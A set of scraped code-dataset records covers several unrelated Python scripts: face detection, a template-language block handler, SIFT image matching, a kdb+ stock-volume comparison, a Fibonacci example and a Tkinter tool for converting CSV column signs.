np.expand_dims(confi, axis=1), landmarks)) # 将偏移量与置信度结合,进行NMS\n boxes = utils.NMS(boxes, threshold=0.4, ismin=True)\n end_time = datetime.datetime.now()\n print(\"ONet cost {}ms\".format((end_time - start_time).microseconds/1000))\n return boxes\n\n \nif __name__ == \"__main__\":\n FILE = \"F:/MTCNN_CeleA/test/video2.mp4\"\n FUNC = Test\n utils.show(FILE, FUNC, 20)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n \n\n\n\n","sub_path":"MTCNN_CeleA/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"489009676","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /cinje/block/generic.py\n# Compiled at: 2019-03-06 14:21:14\n# Size of source mod 2**32: 1805 bytes\n\n\nclass Generic(object):\n __doc__ = 'Block-level passthrough. Blocks must be terminated by \": end\" markers.\\n\\t\\n\\tSupport is included for chains of blocks of the expected types, without requiring \": end\" markers between them.\\n\\t\\n\\tThis block-level transformer handles: \"if\", \"elif\", and \"else\" conditional scopes; \"while\" and \"for\" loops,\\n\\tincluding the optional \"else\" clause to \"for\"; \"with\" context managers; and the exception management machinery of\\n\\t\"try\", \"except\", \"finally\", and \"else\". (Any given intermediary component is optional, of course.)\\n\\t\\n\\tSyntax::\\n\\t\\n\\t\\t: if ...\\n\\t\\t: elif ...\\n\\t\\t: else\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: while ...\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: for ...\\n\\t\\t: else\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: with ...\\n\\t\\t: end\\n\\t\\t\\n\\t\\t: try\\n\\t\\t: except ...\\n\\t\\t: finally\\n\\t\\t: else\\n\\t\\t: end\\n\\t\\n\\tSingle-line conditionals and loops are not allowed, and the declaration should not include a trailing colon.\\n\\t'\n priority = 50\n _keywords = ('if', 'while', 'for', 'with', 'try')\n _continuation = ('elif', 'else', 'except', 'finally')\n _both = _keywords + _continuation\n\n def match(self, context, line):\n \"\"\"Match code lines prefixed with a variety of keywords.\"\"\"\n return line.kind == 'code' and line.partitioned[0] in self._both\n\n def __call__(self, context):\n \"\"\"Process conditional declarations.\"\"\"\n input = context.input\n try:\n declaration = input.next()\n except StopIteration:\n return\n else:\n stripped = declaration.stripped\n prefix, _ = declaration.partitioned\n if prefix in self._continuation:\n yield declaration.clone(line=(stripped + ':'), scope=(context.scope - 1))\n return\n yield declaration.clone(line=(stripped + ':'))\n context.scope += 1\n for i in context.stream:\n yield i\n\n context.scope -= 1","sub_path":"pycfiles/cinje-1.1.2-py2.py3-none-any/generic.cpython-37.opt-1.py","file_name":"generic.cpython-37.opt-1.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460936448","text":"# -*- encoding: utf-8 -*-\n\n# 基于FLANN的匹配器(FLANN based Matcher)定位图片\nimport numpy as np\nimport cv2\nimport time\nfrom RealseCamera_before_svd import RealsenseCamera\n\n\ndef match_template(template_img, draw_img, target_kp, target_descrip, threshold, min_match_count=25):\n\tresult_img = draw_img.copy()\n\t\n\t# Initiate SIFT detector创建sift检测器\n\tsift = cv2.xfeatures2d.SIFT_create()\n\t\n\t# compute the descriptors with ORB\n\ttemplate_kp, template_des = sift.detectAndCompute(template_img, None)\n\t\n\t# 创建设置FLANN匹配\n\tFLANN_INDEX_KDTREE = 0\n\t# 匹配算法\n\tindex_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n\t# 搜索次数\n\tsearch_params = dict(checks=30)\n\tflann = cv2.FlannBasedMatcher(index_params, search_params)\n\t\n\tmatches = flann.knnMatch(template_des, target_descrip, k=2)\n\t\n\t# store all the good matches as per Lowe's ratio test.\n\tgood_match = []\n\t# 舍弃大于threshold的匹配, threshold越小越严格\n\tfor m, n in matches:\n\t\tif m.distance < threshold * n.distance:\n\t\t\tgood_match.append(m)\n\tprint(\"matches found - %d/%d\" % (len(good_match), min_match_count))\n\t\n\tif len(good_match) > min_match_count:\n\t\t# 获取关键点的坐标\n\t\tsrc_pts = np.float32([template_kp[m.queryIdx].pt for m in good_match]).reshape(-1, 1, 2)\n\t\tdst_pts = np.float32([target_kp[m.trainIdx].pt for m in good_match]).reshape(-1, 1, 2)\n\t\t# 计算变换矩阵和MASK\n\t\tM, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n\t\tmatchesMask = mask.ravel().tolist()\n\t\th, w = template_img.shape[:2]\n\t\t# 使用得到的变换矩阵对原图像的四个角进行变换,获得在目标图像上对应的坐标\n\t\tpts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\n\t\tdst = cv2.perspectiveTransform(pts, M)\n\t\tcenter = np.asarray([np.mean(dst[:, 0, 0]), np.mean(dst[:, 0, 1])])\n\t\tprint('dst:', dst)\n\t\tprint('center:', center)\n\t\tresult_img = cv2.polylines(result_img, [np.int32(dst)], True, [0, 0, 255], 2, cv2.LINE_AA)\n\t\tresult_img = cv2.circle(result_img, (center[0], center[1]), 3, (0, 255, 0), 3)\n\telse:\n\t\tmatchesMask = None\n\t\n\treturn result_img\n\n\ndef test_match_thread(target_img, temp_img_ls):\n\tstart_time = time.time()\n\t\n\t# Initiate SIFT detector创建sift检测器\n\tsift = cv2.xfeatures2d.SIFT_create()\n\t\n\t# compute the descriptors with ORB\n\ttarget_kp, target_des = sift.detectAndCompute(target_img, None)\n\t\n\tfor template in temp_img_ls:\n\t\ttarget_img = match_template(template, target_img, target_kp, target_des, 0.8, min_match_count=15)\n\t\n\tprint('full_time', time.time() - start_time)\n\treturn target_img\n\n\nif __name__ == '__main__':\n\trealsense = RealsenseCamera()\n\t\n\ttemp_img_ls = [\n\t\tcv2.imread('imgdata/matchdata/template1.jpg'),\n\t\t# cv2.imread('imgdata/matchdata/template2.jpg'),\n\t\tcv2.imread('imgdata/matchdata/template4.jpg'),\n\t\tcv2.imread('imgdata/matchdata/template5.jpg')\n\t]\n\t\n\twhile True:\n\t\timage = realsense.get_color_image_from_frames(realsense.get_aligned_frames())\n\t\t\n\t\tresult_img = test_match_thread(image, temp_img_ls)\n\t\t\n\t\tcv2.imshow('result', result_img)\n\t\t\n\t\tkey = cv2.waitKey(1)\n\t\tif ord('q') == key or 27 == key:\n\t\t\tcv2.destroyAllWindows()\n\t\t\tbreak\n","sub_path":"sign_match_demo2_work.py","file_name":"sign_match_demo2_work.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"514232063","text":"# -*- coding: utf-8 -*-\nimport qpython\nfrom qpython import qconnection\nimport os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport re\n\n\ndef str2sym(x):\n return np.string_(x)\ndef int2str(x):\n return str(x)\ndef XSHG_Code(ticker):\n return str2sym('{0:>06s}.SH'.format(int2str(ticker)))\ndef XSHE_Code(ticker):\n return str2sym('{0:>06s}.SZ'.format(int2str(ticker)))\n\ndef DY_stck_Code(array_List):\n ticker = array_List['ticker']\n exchangecd = array_List['exchangecd']\n if exchangecd == 'XSHG':\n return XSHG_Code(ticker)\n else:\n return XSHE_Code(ticker)\n\n\ndef volume_compare(array_List):\n kdb_volume = array_List['volume']\n DataYes_colume = array_List['DY_volume']\n if kdb_volume == DataYes_colume:\n return 1\n else:\n return 2\n return \n\n\ndef getTradeDates(x):\n for parent,dirnames,filenames in os.walk(x):\n TradeDates=[]\n for filename in filenames:\n tradedate=re.compile(r'^equity_price([0-9]{8}).txt').findall(filename)\n if tradedate!= []:\n tradedate = datetime.strptime(tradedate[0],\"%Y%m%d\")\n TradeDates.append(tradedate)\n return TradeDates\n \n \n\n\nif __name__ == '__main__':\n print('start!')\n #取DYdata数据\n q = qconnection.QConnection(host='localhost', port=12345, pandas=True)\n q.open()\n rootdir = \"D:\\\\CE.Quants\\\\DQ\\\\testDYdata\\\\equity_price201811\"\n tradeDates = getTradeDates(rootdir)\n #print(tradeDates)\n count=1\n for tradeDate in tradeDates:\n print(tradeDate)\n \n DYmessage = pd.read_table(os.path.join('D:/CE.Quants/DQ/testDYdata/equity_price201811/','equity_price{0:%Y%m%d}.txt'.format(tradeDate)))\n #DYmessage = pd.read_table(os.path.join(os.getcwd(), 'test.txt'))\n #取出股票对应的ticker、shortnm公司简称、exchanged交易所、volume此处为总交易量\n DY_stock_msg = DYmessage.groupby(['ticker','shortnm','exchangecd']).agg({'volume':max}).reset_index()\n #print(DY_stock_msg)\n #print(type(DY_stock_msg))\n #DY_stock = DY_stock_msg.loc[(DY_stock_msg['exchangecd'] == 'XSHG') | (DY_stock_msg['exchangecd'] == 'XSHE')]\n DY_stock_msg['ticker'] = DY_stock_msg.apply(DY_stck_Code, axis=1)\n DY_stock_msg.rename(columns={'ticker':'sym','volume':'DY_volume'}, inplace=True)\n DY_stock_msg['DY_volume']= DY_stock_msg['DY_volume'].astype('float64')\n #print(DY_stock_msg)\n #print(type(DY_stock_msg))\n \n #\n kdb_Daily=q.sync('select date,sym,volume from Daily where date={0:%Y.%m.%d}'.format(tradeDate))\n #print(kdb_Daily)\n #print(type(kdb_Daily))\n \n kdb_DY_inner = pd.merge(kdb_Daily,DY_stock_msg, on='sym' , how='left')\n kdb_DY_inner['Is_equal'] = kdb_DY_inner.apply(volume_compare, axis=1)\n #print(kdb_DY_inner)\n stock_result=kdb_DY_inner.loc[kdb_DY_inner['Is_equal'] == 2]\n stock_result=stock_result.dropna()\n #print(stock_result)\n stock_result.to_csv(os.path.join('D:/CE.Quants/DQ/cpResult/201811','Stock_Result{0:%Y%m%d}.csv'.format(tradeDate)), index=False, encoding='utf-8')\n print(count)\n count = count +1\n \n","sub_path":"201812DataYESDQ/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493452005","text":"#a = int(input(\"Enter a value of n: \"))\n# mydict = dict()\n#\n# def fib(n):\n# if n==0 or n==1:\n# return 1\n# else:\n# return fib(n-1) + fib(n-2)\n#\n#\n# print(fib(a))\n\n\n# to compute the fibonacci quickly for greater numbers\ndef new_fib(n,d):\n if n in d:\n return d[n]\n else:\n ans = new_fib((n-1),d) + new_fib((n-2),d) # calculates fib(n-1) and returns in d\n d[n] = ans # storing each computation of fib(n-1) in ans\n return ans\n\nd = {0:1, 1:2, 2:3, 3:4} # set base values for fibonacci, ie 0,1,1 - index positions 0,1,2\nprint(new_fib(1001,d))\n","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630436697","text":"#==================================================\n# Version\t\t0.01\n#==================================================\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import filedialog\nimport copy\n\nglobal DegComBox\nDegComBox = []\nglobal DegClkRowId\nDegClkRowId = 0\nglobal DegClkIndex\nDegClkIndex = 0\nglobal DegClkColumnId\nDegClkColumnId = 0\n\nglobal OpComBox\nOpComBox = []\nglobal OpClkRowId\nOpClkRowId = 0\nglobal OpClkIndex\nOpClkIndex = 0\nglobal OpClkColumnId\nOpClkColumnId = 0\n\nglobal DegSecList\nglobal OpSecList\nglobal read_raw\nglobal lineindex_time\nglobal filename #载入的文档路弿\nglobal TreeviewPst\nglobal TreeLineNum\nglobal ParList\nglobal DegList\nglobal OpList\nglobal DbClkFished\nglobal Precision\nDegSecList = ['保持','0.1','0.01','0.001','0.0001','0.00001','1','End']\nPrecision = [1.0, 0.1, 0.01, 0.001, 0.0001, 0.00001, 1.0, ]\nOpSecList = ['无操作','正负转换','取绝对值','End']\nDbClkFished = 1\nTreeLineNum = 666\nTreeviewPst = 0.0\nParList = []\nDegList = []\nOpList = []\n\n# 选择文件函数,并对Treeview的显示内容进行初始化\ndef SelectFile():\n global filename\n global TreeLineNum\n global read_raw\n global read_ripe\n global lineindex_time\n global filename\n \n varnum = 0\n InfoLabel.config(text=('Select file...'))\n filename = filedialog.askopenfilename()\n if filename == '':\n \tInfoLabel.config(text=('None file selected!'))\n \treturn\n dir.set(filename)\n # open the csv file\n with open(filename) as f_in:\n # lookup the line index of 时间\n read_raw = f_in.readlines()\n read_ripe = read_raw\n k = 0\n for line in read_raw:\n linelist = line.split(\",\")\n if linelist[0] == \"时间\":\n lineindex_time = k # the line number of the varname 时间/ U2-00/...\n varnum = len(linelist)\n # print(linelist)\n break # linelist is the varname 时间/ U2-00/...\n k = k + 1\n # LineNum = 100 #此处进行赋值,决定要创建多少行Entry类型文本柿\n i = 0\n \n # 删除原有Treeview里面的所有item,避免第二次选择插入项过多的问题\n if TreeLineNum != 666:\n \tTreeIidList = ParTreeview.get_children()\n \tfor item in TreeIidList:\n \t ParTreeview.delete(item)\n \t DegTreeview.delete(item)\n \t OpTreeview.delete(item)\n \n # 初始化插入Treeview的所有内容,并对tags和idd进行赋值。Tags用于改变底色。idd用于识别\n while i < varnum:\n ParList[i] = linelist[i]\n ParTreeview.insert('',i,values=(ParList[i]),tags='Par'+str(i),iid=str(i))\n DegTreeview.insert('',i,values=(DegList[i]),tags='Deg'+str(i),iid=str(i))\n OpTreeview.insert('',i,values=(OpList[i]),tags='Op'+str(i),iid=str(i))\n i = i + 1\n \n TreeLineNum = varnum\n \n # 对每个Treeview的每个item进行底色设置。\n for index in range(TreeLineNum):\n if(1 == (index % 2)):\n ParTreeview.tag_configure('Par' + str(index),background='#E0EFFF')\n else:\n ParTreeview.tag_configure('Par' + str(index),background='#FFFFFF')\n\n if(DegList[index] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n DegTreeview.tag_configure('Deg' + str(index),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(index),background='#FFFFFF')\n\n if(OpList[index] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n OpTreeview.tag_configure('Op' + str(index),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(index),background='#FFFFFF')\n \n InfoLabel.config(text=('Select file finished!'))\n BarSizeAutoSet(0)\n\n\n# 进行文件转换和写入操作\ndef ChangeFile():\n global read_raw\n global lineindex_time\n global read_ripe\n global TreeLineNum\n global Precision\n global DegSecList\n global DegList\n global OpList\n \n OperateLineNum = 0\n\n InfoLabel.config(text=('Start changing file ...'))\n \n read_ripe = copy.copy(read_raw)\n \n for i in range(TreeLineNum):\n if OpList[i] == '正负转换':\n print(i)\n # modify the data\n rowindex = i\n\n temp = 0\n while 1:\n if(DegSecList[temp] == 'End'):\n InfoLabel.config(text=('Precision Error!'))\n return\n elif(DegSecList[temp] == DegList[i]):\n break\n else:\n temp = temp +1\n prsition = Precision[temp]\n \n OperateLineNum = OperateLineNum + 1\n \n for index in range(lineindex_time + 1, len(read_raw)): #read_raw[( + 1):]:\n linelist = read_ripe[index].split(\",\")\n value = float(linelist[rowindex])\n if value < 0:\n value = value + 65536 * prsition\n value = round(value, 3)\n elif value > 32767 * prsition:\n value = value - 65536 * prsition\n value = round(value, 3)\n linelist[rowindex] = str(value)\n read_ripe[index] = ','.join(linelist)\n print(i) \n \n #write the data\n elif OpList[i] == '取绝对值':\n print(i)\n # modify the data\n rowindex = i\n \n OperateLineNum = OperateLineNum + 1\n \n for index in range(lineindex_time + 1, len(read_raw)): #read_raw[( + 1):]:\n linelist = read_ripe[index].split(\",\")\n value = float(linelist[rowindex])\n if value < 0:\n value = - value\n value = round(value, 3)\n linelist[rowindex] = str(value)\n read_ripe[index] = ','.join(linelist)\n print(i) \n # print(linelist)\n #write the data\n elif(TreeLineNum == (i - 1)):\n InfoLabel.config(text=('Operation Error!'))\n return\n \n if(0 == OperateLineNum):\n InfoLabel.config(text=('No Operation'))\n else:\n with open(filename + 'change.csv', 'w') as f_out:\n f_out.writelines(read_ripe)\n InfoLabel.config(text=('Operation finished!'))\n\ndef DegDbClear(event):\n global TreeLineNum\n DegClkRowId = DegTreeview.identify_row(event.y)\n DegClkColumnId = DegTreeview.identify_column(event.x)\n if(TreeLineNum == 666) or (DegClkRowId != ''):\n return\n\n for i in range(TreeLineNum):\n DegList[i] = DegSecList[0]\n DegTreeview.set(i ,DegClkColumnId, DegList[i])\n\n if(DegList[i] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(i),background='#D869FF')\n elif(1 == (i % 2)):\n DegTreeview.tag_configure('Deg' + str(i),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(i),background='#FFFFFF')\n\ndef OpDbClear(event):\n global TreeLineNum\n OpClkRowId = OpTreeview.identify_row(event.y)\n OpClkColumnId = OpTreeview.identify_column(event.x)\n if(TreeLineNum == 666) or (OpClkRowId != ''):\n return\n\n for i in range(TreeLineNum):\n OpList[i] = OpSecList[0]\n OpTreeview.set(i ,OpClkColumnId, OpList[i])\n\n if(OpList[i] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(i),background='#D869FF')\n elif(1 == (i % 2)):\n OpTreeview.tag_configure('Op' + str(i),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(i),background='#FFFFFF')\n\n# 双击Treeview改变值,有下拉框的版本中,该函数未使用\ndef DegDBClick(event):\n global TreeLineNum\n global DegList\n global DegSecList\n# item = DegTreeview.selection()[0]\n# index = DegTreeview.index(item)\n item = DegTreeview.identify_row(event.y)\n index = DegTreeview.index(item)\n \n DegIndex = DegSecList.index(DegList[index])\n if('End' == DegSecList[DegIndex + 1]):\n DegList[index] = DegSecList[0]\n else:\n DegList[index] = DegSecList[DegIndex + 1]\n \n DegTreeview.delete(item)\n DegTreeview.insert('',index,values=(DegList[index]),tags='Deg'+str(index),iid=str(index))\n\n if(DegList[index] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n DegTreeview.tag_configure('Deg' + str(index),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(index),background='#FFFFFF')\n\n# 双击Treeview改变值,有下拉框的版本中,该函数未��用\ndef OpDBClick(event):\n global TreeLineNum\n global OpList\n global OpSecList\n item = OpTreeview.identify_row(event.y)\n index = OpTreeview.index(item)\n \n OpIndex = OpSecList.index(OpList[index])\n if('End' == OpSecList[OpIndex + 1]):\n OpList[index] = OpSecList[0]\n else:\n OpList[index] = OpSecList[OpIndex + 1]\n \n OpTreeview.delete(item)\n OpTreeview.insert('',index,values=(OpList[index]),tags='Op'+str(index),iid=str(index))\n\n if(OpList[index] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(index),background='#D869FF')\n elif(1 == (index % 2)):\n OpTreeview.tag_configure('Op' + str(index),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(index),background='#FFFFFF')\n\n# 滑块移动,对应三个Treeview同时进行上下滑动。有三种方式:拉滑块;点击滚动条;点击上下按钮\ndef BarMove(*Date):\n global TreeviewPst\n global TreeLineNum\n if 666 == TreeLineNum:\n return\n\n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy()\n\n if(Date[0] == 'moveto'):\n BarPos = float(Date[1])\n if(BarPos > (1.0-TreeviewPst)):\n BarPos = (1.0-TreeviewPst)\n elif(BarPos < 0):\n BarPos = 0\n startP=BarPos\n elif(Date[0] == 'scroll'):\n startP = float((bar.get())[0])\n if(Date[2] == 'pages'):\n if(Date[1] == '1'):\n startP = startP + TreeviewPst\n if(startP > (1.0 - TreeviewPst)):\n startP = 1.0 - TreeviewPst\n elif(Date[1] == '-1'):\n startP = startP - TreeviewPst\n if(startP < 0.0):\n startP = 0.0\n elif(Date[2] == 'units'):\n TreeUnit = 1.0 / TreeLineNum\n if(Date[1] == '1'):\n startP = startP + TreeUnit\n if(startP > (1.0 - TreeviewPst)):\n startP = 1.0 - TreeviewPst\n elif(Date[1] == '-1'):\n startP = startP - TreeUnit\n if(startP < 0.0):\n startP = 0.0 \n EndP = startP + TreeviewPst\n bar.set(str(startP),str(EndP))\n ParTreeview.yview(MOVETO,startP)\n DegTreeview.yview(MOVETO,startP)\n OpTreeview.yview(MOVETO,startP)\n\n# Paraview的点击事件,对应选中操作,并清除创建的下拉框\ndef ParClick(event):\n global TreeLineNum\n if(TreeLineNum == 666):\n return\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy()\n \n item = ParTreeview.identify_row(event.y)\n index = ParTreeview.index(item)\n DegTreeview.selection_set(item)\n OpTreeview.selection_set(item)\n ParTreeview.selection_set(item)\n \n if(DegList[index] != DegSecList[0]):\n DegTreeview.selection_remove(item)\n \n if(OpList[index] != OpSecList[0]):\n OpTreeview.selection_remove(item)\n\n# 按钮抬起操作,用于右边两个Treeview\ndef TreeButtonRelease(event):\n global TreeLineNum\n if(TreeLineNum == 666):\n return\n \n item = ParTreeview.identify_row(event.y)\n index = ParTreeview.index(item)\n DegTreeview.selection_set(item)\n OpTreeview.selection_set(item)\n ParTreeview.selection_set(item)\n \n if(DegList[index] != DegSecList[0]):\n DegTreeview.selection_remove(item)\n \n if(OpList[index] != OpSecList[0]):\n OpTreeview.selection_remove(item)\n \n# 下拉框选中值之后,对对应的Treeview进行操作,并清除当前的下拉框\ndef DegComBoxSeclected(*Date):\n global DegClkIndex\n global TreeLineNum\n global DegClkRowId\n global OpList\n \n DegList[DegClkIndex] = DegComBox.get()\n DegComBox.destroy()\n \n DegTreeview.delete(DegClkRowId)\n DegTreeview.insert('',DegClkIndex,values=(DegList[DegClkIndex]),tags='Deg'+str(DegClkIndex),iid=str(DegClkIndex))\n\n if(DegList[DegClkIndex] != DegSecList[0]):\n DegTreeview.tag_configure('Deg' + str(DegClkIndex),background='#D869FF')\n elif(1 == (DegClkIndex % 2)):\n DegTreeview.tag_configure('Deg' + str(DegClkIndex),background='#E0EFFF')\n else:\n DegTreeview.tag_configure('Deg' + str(DegClkIndex),background='#FFFFFF')\n\n# 精度所在的Treeview的点击操作,创建一个下拉框。\ndef DegClick(event):\n global DegComBox\n global TreeLineNum\n global DegClkRowId\n global DegClkIndex\n global DegClkColumnId\n if(TreeLineNum == 666):\n return\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy() \n \n DegClkRowId = DegTreeview.identify_row(event.y)\n DegClkColumnId = DegTreeview.identify_column(event.x)\n \n if(DegClkRowId == ''):\n return\n\n DegClkIndex = ParTreeview.index(DegClkRowId)\n \n x,y,width,height = DegTreeview.bbox(DegClkRowId, DegClkColumnId)\n pady = height // 2\n \n DegComBox = ttk.Combobox(DegTreeview, width=int(width/10))\n DegComBox.config(values = DegSecList)\n DegComBox.current(DegSecList.index(DegList[DegClkIndex]))\n DegComBox.place( x=x, y=y+pady,width=width, anchor=W)\n DegComBox.bind(\"<>\",DegComBoxSeclected)\n \n# 下拉框选中值之后,对对应的Treeview进行操作,并清除当前的下拉框\ndef OpComBoxSeclected(*Date):\n global OpClkIndex\n global TreeLineNum\n global OpClkRowId\n global OpList\n \n OpList[OpClkIndex] = OpComBox.get()\n OpComBox.destroy()\n \n OpTreeview.delete(OpClkRowId)\n OpTreeview.insert('',OpClkIndex,values=(OpList[OpClkIndex]),tags='Op'+str(OpClkIndex),iid=str(OpClkIndex))\n\n if(OpList[OpClkIndex] != OpSecList[0]):\n OpTreeview.tag_configure('Op' + str(OpClkIndex),background='#D869FF')\n elif(1 == (OpClkIndex % 2)):\n OpTreeview.tag_configure('Op' + str(OpClkIndex),background='#E0EFFF')\n else:\n OpTreeview.tag_configure('Op' + str(OpClkIndex),background='#FFFFFF')\n\n# Operation所在的Treeview的点击操作,创建一个下拉框。\ndef OpClick(event):\n global OpComBox\n global TreeLineNum\n global OpClkRowId\n global OpClkIndex\n global OpClkColumnId\n if(TreeLineNum == 666):\n return\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy() \n \n OpClkRowId = OpTreeview.identify_row(event.y)\n OpClkColumnId = OpTreeview.identify_column(event.x)\n \n if(OpClkRowId == ''):\n return\n\n OpClkIndex = ParTreeview.index(OpClkRowId)\n \n x,y,width,height = OpTreeview.bbox(OpClkRowId, OpClkColumnId)\n pady = height // 2\n \n OpComBox = ttk.Combobox(OpTreeview,width= int(width/10))\n OpComBox.config(values = OpSecList)\n OpComBox.current(OpSecList.index(OpList[OpClkIndex]))\n OpComBox.place( x=x, y=y+pady, width=width, anchor=W)\n OpComBox.bind(\"<>\",OpComBoxSeclected)\n\n# 根据窗口自动调整滑动条的滑块大小\ndef BarSizeAutoSet(event):\n global TreeviewPst\n global TreeLineNum\n global DegTreeview\n global DegComBox\n global DegClkRowId\n global DegClkColumnId\n global OpTreeview\n global OpComBox\n global OpClkRowId\n global OpClkColumnId\n \n if(TreeLineNum == 666):\n \treturn\n \n if(str(event) == '0'):\n win.update()\n TreeHigh = ParTreeview.winfo_height()\n else:\n TreeHigh = event.height\n if DegComBox:\n x,y,width,height = DegTreeview.bbox(DegClkRowId,DegClkColumnId)\n pady = height // 2\n DegComBox.place( x=x, y=y+pady, width=width, anchor=W)\n if OpComBox:\n x,y,width,height = OpTreeview.bbox(OpClkRowId, OpClkColumnId)\n pady = height // 2\n OpComBox.place( x=x, y=y+pady, width=width, anchor=W)\n \n Remainder = TreeHigh % 20\n TreeviewPst = (TreeHigh-27.0) / (TreeLineNum * 20.0 + Remainder)\n BarStart = bar.get()[0]\n bar.set(BarStart,str(BarStart + TreeviewPst)) \n\n# Treeview使用鼠标滚轮滚动后,自动调整另外两个Treeview的位置,并同步修改滚动条的位置\ndef TreeviewScroll(*Date):\n global TreeviewPst\n global TreeLineNum\n if(TreeLineNum == 666):\n \treturn\n \n if DegComBox:\n DegComBox.destroy() \n if OpComBox:\n OpComBox.destroy()\n\n ParTreeview.yview('moveto',float(Date[0]))\n DegTreeview.yview('moveto',float(Date[0]))\n OpTreeview.yview('moveto',float(Date[0]))\n bar.set(Date[0],str(float(Date[0]) + TreeviewPst)) \n\n\n#建立窗口\nwin = Tk()\nwin.title('Flying Driver')\nwin.geometry('450x550')\n#win.iconbitmap('bitbug_favicon.ico')\n#win.resizable(0,0) #阻止Python GUI的大小调擿\n\nTopFrame = ttk.Frame(win)\nTopFrame.pack(fill=X,padx=5,pady=5,expand=FALSE,side=TOP)\n\n#创建单行文本框,输入地址使用\ndir = StringVar()\ndirEntry = ttk.Entry(TopFrame, textvariable=dir, width=20)\ndirEntry.pack(fill=X,padx=0,pady=0,expand=TRUE,side=LEFT)\n#dirEntered.insert(INSERT,\"输入路径...\")\n\n# 创建按钮,用于输入地址使用\nViewButton = ttk.Button(TopFrame)\nViewButton.config(text='View',command=SelectFile,width =4)\nViewButton.pack(expand=FALSE,side=LEFT,padx=0,pady=0)\n\n# 空白标签,占位分开view和echange按钮\nSpaceLabel = ttk.Label(TopFrame)\nSpaceLabel.config(width = 0)\nSpaceLabel.pack(expand=FALSE,padx=5,pady=0,side=LEFT)\n\n# 创建按钮,用于进行转换操作\nChgButton = ttk.Button(TopFrame)\nChgButton.config(text='Exchange',command=ChangeFile,width=8)\nChgButton.pack(expand=FALSE,side=RIGHT,padx=0,pady=0)\n\n# 创建框架,用于摆放三个Treeview控件\nBotFrame = ttk.Frame(win)\nBotFrame.pack(fill=BOTH,padx=5,pady=5,expand=TRUE,side=TOP)\n\nParTreeview = ttk.Treeview(BotFrame)\nParTreeview.config(columns=('Parameter'),show='headings',yscrollcommand=TreeviewScroll)\nParTreeview.column('Parameter', width=150, anchor='w')\nParTreeview.heading('Parameter', text='Parameter')\nParTreeview.pack(expand=TRUE,fill=BOTH,padx=0,pady=0,side=LEFT)\n\nDegTreeview = ttk.Treeview(BotFrame)\nDegTreeview.config(columns=('Degree'),show='headings',yscrollcommand=TreeviewScroll)\nDegTreeview.column('Degree', width=5, anchor='w')\nDegTreeview.heading('Degree', text='Precision')\nDegTreeview.pack(expand=TRUE,fill=BOTH,padx=0,pady=0,side=LEFT)\n\nOpTreeview = ttk.Treeview(BotFrame)\nOpTreeview.config(columns=('Operation'),show='headings',yscrollcommand=TreeviewScroll)\nOpTreeview.column('Operation', width=5, anchor='w')\nOpTreeview.heading('Operation', text='Operation')\nOpTreeview.pack(expand=TRUE,fill=BOTH,padx=0,pady=0,side=LEFT)\n\n# 创建滑块,用于控制三个Treeview的滚动\nbar=ttk.Scrollbar(BotFrame)\nbar.config(command=BarMove)#ParTreeview.yview)\nbar.pack(fill=Y,side=RIGHT,expand=FALSE,padx=0,pady=0)\n\n# 底部标签,显示当前的操作状态\nInfoLabel = ttk.Label(win)\nInfoLabel.config(text=('Drivering...'))\nInfoLabel.pack(fill=X,expand=FALSE,padx=5,pady=0,side=BOTTOM)\n\n# 初始化Treeview对应的三个List的值\nfor i in range(100):\n ParList.append('Par')\n DegList.append('保持')\n OpList.append('无操作')\n\n# 窗口大小改变,需要改变滑块的大小\nBotFrame.bind(\"\",BarSizeAutoSet)\n#DegTreeview.bind(\"\", DegDBClick)\n#OpTreeview.bind(\"\", OpDBClick)\n\n# 绑定三个Treeview的点击操作,包括下拉框选择和当前选中条目的设置\nParTreeview.bind(\"\",ParClick )\nDegTreeview.bind(\"\", DegClick)\nDegTreeview.bind(\"\", 